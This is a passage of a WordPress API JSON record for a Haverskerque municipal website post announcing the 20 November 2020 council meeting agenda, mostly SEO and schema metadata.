d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 20 Novembre 2020 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 20 Novembre 2020 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR&nbsp;: \u00a0Informations du maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.\u00a0Approbation du proc\u00e8s-verbal du conseil municipal du 18 septembre 20201. Instauration d\u2019une redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution d\u2019\u00e9lectricit\u00e9.2. Instauration de la redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution de gaz.3. Instauration d\u2019une redevance d\u2019occupation du domaine public par les r\u00e9seaux de t\u00e9l\u00e9communication.4. Instauration d\u2019une redevance d\u2019occupation du domaine public pour les chantiers provisoires d\u2019\u00e9lectricit\u00e9 et de gaz.5. Renouvellement de la convention de mise \u00e0 disposition du service commun d\u2019instruction des actes et autorisation d\u2019urbanisme avec la CCFL.6. Renouvellement de la convention cadre r\u00e9gissant les rapports entre la CCFL et ses communes membres pour l\u2019exercice partage de la comp\u00e9tence voirie.7. Renouvellement des groupements de commandes pour l\u2019achat de biens et de prestations de services avec la CCFL.8. Engagement de la commune dans la d\u00e9marche pour la convention territoriale globale.9. Autorisation de signature de la convention de renouvellement de l\u2019op\u00e9ration \u00ab\u00a0action fruits\u00a0\u00bb pour l\u2019ann\u00e9e scolaire 2020-2021.10. Adh\u00e9sion au groupement de commandes relatif \u00e0 la restauration et \u00e0 la reliure des actes administratifs et\/ou d\u2019\u00e9tat civil.11. D\u00e9signation des repr\u00e9sentants de la commune \u00e0 l\u2019agence iNord.12. Modification du r\u00e8glement int\u00e9rieur des m\u00e9diath\u00e8ques de l\u2019Esperluette.13. Autorisation d\u2019\u00e9limination des \u0153uvres de la m\u00e9diath\u00e8que Medi@lys.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2020-11-21T17:12:00+00:00","article_modified_time":"2024-07-29T04:39:15+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 20 Novembre 2020","datePublished":"2020-11-21T17:12:00+00:00","dateModified":"2024-07-29T04:39:15+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/"},"wordCount":274,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/","name":"Conseil Municipal du 20 Novembre 2020 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2020-11-21T17:12:00+00:00","dateModified":"2024-07-29T04:39:15+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 20 Novembre 2020"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=702"}],"version-history":[{"count":5,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/702\/revisions"}],"predecessor-version":[{"id":8311,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/702\/revisions\/8311"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}